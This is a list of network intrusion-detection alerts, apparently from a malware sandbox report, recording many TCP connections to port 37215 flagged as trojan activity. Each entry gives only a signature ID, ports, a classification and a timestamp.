                  SID:2835222
                  Source Port:36932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.700546
                  SID:2829579
                  Source Port:32910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013790
                  SID:2835222
                  Source Port:49922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.954473
                  SID:2829579
                  Source Port:57400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.118547
                  SID:2835222
                  Source Port:58986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.162688
                  SID:2835222
                  Source Port:35346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.087828
                  SID:2829579
                  Source Port:36656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.714362
                  SID:2835222
                  Source Port:54370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815685
                  SID:2829579
                  Source Port:48098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.163403
                  SID:2835222
                  Source Port:38524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412517
                  SID:2835222
                  Source Port:53000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2829579
                  Source Port:37150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.070223
                  SID:2835222
                  Source Port:48930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.686336
                  SID:2829579
                  Source Port:41088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.343631
                  SID:2829579
                  Source Port:44794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.631449
                  SID:2829579
                  Source Port:34590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.310052
                  SID:2829579
                  Source Port:34012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.134905
                  SID:2835222
                  Source Port:44744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.878785
                  SID:2829579
                  Source Port:57656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996170
                  SID:2829579
                  Source Port:38014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.255856
                  SID:2835222
                  Source Port:53930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.270809
                  SID:2835222
                  Source Port:48050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.843538
                  SID:2829579
                  Source Port:44690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2835222
                  Source Port:33602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.206516
                  SID:2829579
                  Source Port:56930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308313
                  SID:2835222
                  Source Port:36752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.040763
                  SID:2829579
                  Source Port:56984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.380846
                  SID:2829579
                  Source Port:50248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034807
                  SID:2835222
                  Source Port:42672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.070313
                  SID:2835222
                  Source Port:42906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.275264
                  SID:2030490
                  Source Port:39332
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.812708
                  SID:2829579
                  Source Port:46006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632991
                  SID:2829579
                  Source Port:43252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.864368
                  SID:2829579
                  Source Port:54362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.411505
                  SID:2835222
                  Source Port:58990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.833354
                  SID:2835222
                  Source Port:38742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865384
                  SID:2829579
                  Source Port:41062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.244289
                  SID:2829579
                  Source Port:45482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.801856
                  SID:2829579
                  Source Port:42344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.507737
                  SID:2829579
                  Source Port:38884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612567
                  SID:2829579
                  Source Port:40582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064051
                  SID:2829579
                  Source Port:54510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430533
                  SID:2829579
                  Source Port:53270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962913
                  SID:2829579
                  Source Port:50294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596557
                  SID:2835222
                  Source Port:56226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850247
                  SID:2835222
                  Source Port:59496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.061013
                  SID:2835222
                  Source Port:42840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974757
                  SID:2835222
                  Source Port:49532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.426322
                  SID:2835222
                  Source Port:41782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850872
                  SID:2835222
                  Source Port:54532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.492988
                  SID:2829579
                  Source Port:52888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.859326
                  SID:2835222
                  Source Port:35980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.810492
                  SID:2829579
                  Source Port:56856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.997757
                  SID:2829579
                  Source Port:52188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.082444
                  SID:2835222
                  Source Port:41124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.829838
                  SID:2829579
                  Source Port:58660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.860241
                  SID:2835222
                  Source Port:37560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.367822
                  SID:2835222
                  Source Port:41264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.875122
                  SID:2829579
                  Source Port:40086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171308
                  SID:2835222
                  Source Port:51102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.119978
                  SID:2835222
                  Source Port:43166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622208
                  SID:2829579
                  Source Port:39400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.930927
                  SID:2835222
                  Source Port:35518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.466944
                  SID:2829579
                  Source Port:60388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.647233
                  SID:2835222
                  Source Port:35290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.646782
                  SID:2829579
                  Source Port:60646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976996
                  SID:2835222
                  Source Port:59842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.153663
                  SID:2829579
                  Source Port:49604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254511
                  SID:2829579
                  Source Port:42832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.323441
                  SID:2835222
                  Source Port:39678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.348992
                  SID:2829579
                  Source Port:33520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.436388
                  SID:2835222
                  Source Port:48526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373909
                  SID:2835222
                  Source Port:40782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.647678
                  SID:2835222
                  Source Port:51520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.520093
                  SID:2835222
                  Source Port:47118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.623300
                  SID:2829579
                  Source Port:44582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871447
                  SID:2829579
                  Source Port:38288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.101557
                  SID:2835222
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.663247
                  SID:2829579
                  Source Port:51910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211996
                  SID:2835222
                  Source Port:32892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807456
                  SID:2835222
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.683059
                  SID:2829579
                  Source Port:55358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463374
                  SID:2835222
                  Source Port:56166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.583920
                  SID:2829579
                  Source Port:57434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974548
                  SID:2835222
                  Source Port:54402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.489604
                  SID:2829579
                  Source Port:36702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.267264
                  SID:2829579
                  Source Port:33444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.894192
                  SID:2835222
                  Source Port:54248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151855
                  SID:2835222
                  Source Port:44346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.957174
                  SID:2829579
                  Source Port:39520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.913134
                  SID:2835222
                  Source Port:34190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564607
                  SID:2835222
                  Source Port:59212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.962106
                  SID:2829579
                  Source Port:39756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.326786
                  SID:2835222
                  Source Port:40280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.309274
                  SID:2835222
                  Source Port:35082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.103998
                  SID:2835222
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.614588
                  SID:2835222
                  Source Port:32954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.633265
                  SID:2835222
                  Source Port:42728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.795467
                  SID:2835222
                  Source Port:54900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.133795
                  SID:2835222
                  Source Port:47172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657792
                  SID:2835222
                  Source Port:60340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.812623
                  SID:2835222
                  Source Port:55876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2829579
                  Source Port:40794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.953647
                  SID:2835222
                  Source Port:53202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.732568
                  SID:2829579
                  Source Port:56442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.868022
                  SID:2835222
                  Source Port:42792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871389
                  SID:2835222
                  Source Port:38088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.802281
                  SID:2829579
                  Source Port:49332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.580617
                  SID:2835222
                  Source Port:38448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828942
                  SID:2829579
                  Source Port:54856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.454702
                  SID:2829579
                  Source Port:50830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777309
                  SID:2829579
                  Source Port:54786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420785
                  SID:2835222
                  Source Port:39268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.021339
                  SID:2835222
                  Source Port:34544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.423552
                  SID:2835222
                  Source Port:47064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.757407
                  SID:2835222
                  Source Port:60652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879681
                  SID:2835222
                  Source Port:34634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.817367
                  SID:2829579
                  Source Port:43866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.971781
                  SID:2829579
                  Source Port:60582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.973446
                  SID:2835222
                  Source Port:51552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828075
                  SID:2835222
                  Source Port:36794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2835222
                  Source Port:48956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744023
                  SID:2829579
                  Source Port:57328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.273552
                  SID:2829579
                  Source Port:38764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.827269
                  SID:2829579
                  Source Port:56488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.160645
                  SID:2829579
                  Source Port:55648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.921577
                  SID:2835222
                  Source Port:50866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860758
                  SID:2829579
                  Source Port:37774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.643122
                  SID:2835222
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.849597
                  SID:2829579
                  Source Port:36818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.180915
                  SID:2835222
                  Source Port:35736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.526946
                  SID:2835222
                  Source Port:35638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.015833
                  SID:2829579
                  Source Port:56070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.578531
                  SID:2835222
                  Source Port:54250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.308441
                  SID:2835222
                  Source Port:33188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.944387
                  SID:2835222
                  Source Port:48046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.431094
                  SID:2835222
                  Source Port:37570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278006
                  SID:2835222
                  Source Port:53054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2835222
                  Source Port:49692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.277913
                  SID:2835222
                  Source Port:36548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.446486
                  SID:2835222
                  Source Port:47598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547340
                  SID:2835222
                  Source Port:41836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.842184
                  SID:2829579
                  Source Port:51986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.067488
                  SID:2835222
                  Source Port:43488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.375708
                  SID:2835222
                  Source Port:60878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.183618
                  SID:2829579
                  Source Port:56758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.650681
                  SID:2829579
                  Source Port:35246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2835222
                  Source Port:56278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.719591
                  SID:2829579
                  Source Port:59968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.373871
                  SID:2829579
                  Source Port:45078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.374713
                  SID:2835222
                  Source Port:47644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.231574
                  SID:2835222
                  Source Port:57582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.835893
                  SID:2835222
                  Source Port:57108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.356515
                  SID:2829579
                  Source Port:52396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.500844
                  SID:2829579
                  Source Port:56934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853390
                  SID:2829579
                  Source Port:50586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.677011
                  SID:2829579
                  Source Port:38604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.102138
                  SID:2829579
                  Source Port:54610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.426359
                  SID:2835222
                  Source Port:52804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428275
                  SID:2835222
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.514875
                  SID:2829579
                  Source Port:45642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.100122
                  SID:2835222
                  Source Port:44706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.796120
                  SID:2835222
                  Source Port:40488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.432344
                  SID:2835222
                  Source Port:34782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.573504
                  SID:2829579
                  Source Port:38868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.085141
                  SID:2829579
                  Source Port:48500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563035
                  SID:2835222
                  Source Port:38920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.345692
                  SID:2829579
                  Source Port:33620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211996
                  SID:2835222
                  Source Port:58952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.579889
                  SID:2835222
                  Source Port:40558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.293850
                  SID:2835222
                  Source Port:53070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.221493
                  SID:2829579
                  Source Port:37284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.875451
                  SID:2835222
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.228923
                  SID:2835222
                  Source Port:56266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.501102
                  SID:2835222
                  Source Port:51248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.129379
                  SID:2829579
                  Source Port:43510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.995601
                  SID:2829579
                  Source Port:51254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.789449
                  SID:2829579
                  Source Port:38502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603772
                  SID:2835222
                  Source Port:35644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.167079
                  SID:2829579
                  Source Port:42728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2829579
                  Source Port:59814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.560265
                  SID:2829579
                  Source Port:44038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.341408
                  SID:2829579
                  Source Port:43278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
